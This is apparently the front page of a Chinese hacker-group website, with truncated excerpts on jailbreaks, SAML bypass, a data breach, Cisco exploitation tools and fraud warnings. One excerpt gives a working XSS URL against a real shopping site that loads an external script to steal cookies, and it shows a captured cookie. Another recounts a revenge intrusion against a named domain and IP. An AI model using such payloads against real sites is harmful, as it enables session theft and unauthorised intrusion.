中国红客帝国官方网站
    24小时排行
  • 最新
  • 热门
  • 冷门
  • 随机

置顶推荐

      红客帝国是当前国内为数不多的民间网络信息安全研究团队之一。作为专业的安全技术交流平台,红客帝国何盈利与商业性质,本着“低调求发展”的理念、在严格遵守国家法律的前提下低调和谐健康发展,其浓厚的讨论氛围,广泛的研究范围,令不少安全爱好者神往! 红客帝国严格控制团队成员的加入,目前活跃在红客帝国里的成员大多是国内各大互联网公司、各大网络安全公司的网络安全工程师,以及国内各大院校的对网络安全感兴趣的大学生。大家团结在红客帝国共同提高,实现自己的理想。   红客帝国欢迎您的加入! 任何事项请联系官方邮箱:[email protected](官方邮箱申请联系QQ:648053341) &...

最近更新

红客帝国欢迎你的加入

  红客帝国是当前国内为数不多的民间网络信息安全研究团队之一。作为专业的安全技术交流平台,红客帝国何盈利与商业性质,本着“低调求发展”的理念、在严格遵守国家法律的前提下低调和谐健康发展,其浓厚的讨论氛围,广泛的研究范围,令不少安全爱好者神往! 红客帝国严格控制团队成员的加入,目前活跃在红客帝国里的成员大多是国内各大互联网公司、各大网络安全公司的网络安全工程师,以及国内各大院校的对网络安全感兴趣的大学生。大家团结在红客帝国共同提高,实现自己的理想。   红客帝国欢迎您的加入! 任何事项请联系官方邮箱:[email protected](官方邮箱申请联系QQ:648053341)  官方群: 234116828  303404076 ...

2015-3-16 21:22 Monday Comments:3
著名黑客:还想越狱就不要升级到iOS 10.2

越狱对于 iOS 10 来说还是一片空白,目前尽管网上流传着一系列 iOS 10 的越狱视频,但对于越狱工具的发布日期一直都没有确切的消息。说到越狱最新的 iOS 系统,著名的 iOS 黑客 Luca Todesco 无疑有一定的发言权,此人多次在网上发布越狱成功的视频,但由于一直没有发布越狱工具,他也多次遭到了越狱用户的“讨伐”。   针对 iOS 10 目前还没有越狱工具的这一情况,近日 Todesco 也向用户指出了一些建议。他近日表示如果用户想要在日后成功越狱的话,就应该将系统停留在 iOS 10.1.1,并且需要避免升级到 iOS 10.2 正式版。 尽管目前还不知道 iOS 10 的越狱工具何时到来,但 Todesco 近日发表的一系列推文暗示 iOS 10.2 修复了大量的 bug,其中就包括了一些用于越狱的漏...

2016-12-8 13:32 Thursday Comments:0
利用XML签名攻击绕过SAML 2.0 SSO

最近,我们注意到一种趋势:许多新西兰的网站计划实现SSO(Single Sign-On,单点登录)以替代密码登录,这其中也包括了许多政府类网络服务。目前最流行的SSO标准是SAML 2.0,它支持多个开发框架,同时也支持多种开发语言。通常情况下,SAML 2.0标准在将验证用户身份的SAML响应数据返回给浏览器的过程中,使用数字签名以防止数据被篡改。但不幸的是,许多开发人员并未恰当地验证SAML响应数据,这就给了攻击者可乘之机,攻击者可以绕过身份认证。 SAML 2.0 SSO简介 安全声明标记语言(Security Assertion Markup Language,SAML)是一个基于XML的标准,用于在不同的安全域(Security domain)之间交换认证和授权数据。当使用SAML 2.0标准登录一个站点时,一共有三方参与进来:服务提供商SP(Service Provid...

2016-12-8 13:27 Thursday Comments:0
日本化妆品牌资生堂确认42万用户数据泄露,包括大量信用卡信息

日本化妆品巨头之一的资生堂公司宣称数据泄露。所泄数据涉及到42万用户,其中包括他们的财务信息。 首先是本月初,日本每日新闻社爆料,化妆品巨头资生堂被黑,数据也因此泄露。紧接着,资生堂公司即宣布,这起黑客入侵事件是11月4日发现的——黑客是通过入侵公司的在线商城来窃取数据的。这个商城由资生堂的子公司IPSA运营,其上主要出售资生堂的化妆品。 IPSA公司是在11月4号收到一份来自某支付代理机构的报告之后,才发现存在数据泄露。公司透露,黑客接触到了大约42万用户的个人信息,而这些信息都有可能已经泄露。 日本每日新闻提到:“所泄数据包括用户的姓名和地址,IPSA公司也确认一部分用户的财务信息也被泄露了。还有多达5.6万用户的信用卡信息可能被窃。” IPSA还提到,在2011年12月14日——2016年11月4日期间,如果用户在其在线商城曾经购物,那么他们的账户都是不安全的。 事件发...

2016-12-8 13:19 Thursday Comments:0标签: 数据泄露
漏洞分析之cisco分析工具

cisco Auditing: 一个很小的安全审计工具,扫描Cisco路由器的一般性漏洞,例如默认密码,SNMP community字串和一些老的IOS bug. CAT -h xx.xx.xx.xx。 cisco-global-exploiter:cisco漏洞渗透测试,有14个不同的漏洞。不过检查大部分漏洞都比较老旧了。cge-pl xx.xx.xx.xx number。 cisco-ocs: 用于检测使用默认telnet/enable密码的Cisco设备。cisco-ocs ip ip。 cisco-torch: Cisco Torch是集大规模扫描,指纹识别和利用工具的下一代“黑掉暴露的思科网络”工具, Cisco-torch与类似工具不同的主要特性是大量启动多个后台扫描进程,以实现...

2016-12-6 20:05 Tuesday Comments:0标签: 漏洞分析
警方公布31种网络诈骗套路 “猜猜我是谁”居首

  近日,重庆晨报记者从重庆市渝中区公安分局通讯网络诈骗大队获悉了通讯网络诈骗案件的31种常用实施手段,诈骗“套路”之多,让人瞠目结舌。 在这些诈骗套路中,有些套路是我们司空见惯的,有些套路则是我们闻所未闻的,有些套路我们觉得幼稚可笑,但有些套路确实也让我们觉得防不胜防。一起来看看,通讯网络诈骗中,骗子们这31路“招数”你到底能不能见招拆招。 冒充公检法 犯罪分子冒充银行、通信运营商、广电、社保、医保等单位工作人员,以事主银行卡、电话、有线、社保卡、医保卡等具有消费功能的工具被冒用涉嫌洗钱、贩毒等犯罪为恐吓事由,之后冒充公检法等司法机关工作人员以调查核查为由,诱骗事主向所谓的“安全账户”转账打款,或者套取事主银行卡号、密码等重要信息,从而实施诈骗。 猜猜我是谁 犯罪分子获取受害者的电话号码...

2016-12-6 20:01 Tuesday Comments:0标签: 网络诈骗
美国物联网肉鸡再升级:每秒400Gb流量,可攻陷任何网站

本周五,美国著名的网络安全公司 CloudFlare 在官方博客发出网络安全预警, 他们检测到过去一周每天都有 400Gbps 的 DDoS 攻击。让人感到害怕的是,大部分流量与上月的美国网络沦陷事件的物联网摄像头设备无关,或许黑客已经发现了更多的物联网设备。 美国媒体 ArsTechnica 表示,虽然 400Gbps (8Gb=1GB)的流量不如上个月的网络沦陷事件发生时的一半,但却可以攻陷任何一家没有采取 DDoS 防护的网站。最近,这一攻击也从每天的 8.5 小时变成了全天 24 小时的不间断攻击,而且肉鸡数量在不断上升。该网站编辑表示,「很有可能会发生超过上个月 DDoS 攻击流量的网络事件」。 处于安全角度考虑,检测到这一流量的 CloudFla...

2016-12-6 19:53 Tuesday Comments:0
Python内建方法

内建方法 说明:[,xxx]表示为可选参数。 abs(x) 返回x的绝对值,例如: abs(-1.23) # 1.23 all(iterable) 如果iterable(迭代对象)的所有元素为真(或者iterable为空:[],”,()等),返回True。例如: all('') # True all([1,2,3,0]) # False any(iterable) 如果iterable中只要又一个元素为真,就返回True。例如: any([1,2,3,0]) # True basestring() 它是str和unicode的超类,不能被调用或者实例化。只能用来测试一个对象是不是str或unicode的实例。例如: a = u'a' b = 'b' isinstance(a, basestring) # True isinstan...

2016-11-16 13:10 Wednesday Comments:0
简单渗透网站案例

作者:窝窝头 上一年黑桃儿子通过无法表哥关系得到我FTP密码 后来挂我论坛  到处造谣,还利益无法表哥,今天我替天行道,报仇雪恨! 信息收集 网站域名:98idc.net   www.98idc.net 操作系统: 网站IP  :203.189.232.218 (无CDN) PS:其实我信息收集也很渣......完全是为了装逼才写的...这些图是我之前截图下来的....现在他把服务器和域名都关了.. 漏洞挖掘(渗透过程) 0X001 起因: 原来知道黑桃有在做 IDC 但是没有去管他.直到团队的王大 爷给我说想搞黑桃的 98IDC 的时候. 我们就开始搞了. 0X002 开始...

2016-9-29 20:24 Thursday Comments:0标签: 奇葩思路渗透
蘑菇街一处xss直接打cookie

漏洞详情: http://ai.mogujie.com/search/1/pop?minPrice=1&maxPrice=1 minPrice=1 地址http://ai.mogujie.com/search/1/pop?minPrice=%3Cscript%20src=http://t.cn/Rts28iE%3E%3C/script%3E&maxPrice=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E然后再稀松平常的插入  然后效果就出来了 可以反射 这是我反射出来的cookie :__mgjuuid=9709a8c1-4f1c-05a5-cc65-50c1a46907c2; FRMS_FINGERPRINT=1291502f1bd97b0e7d8000919690eac8f2033f041411...

2016-9-11 10:18 Sunday Comments:0
1 2 3 4 5 6 ... »
Power By H.E.C
    189.98ms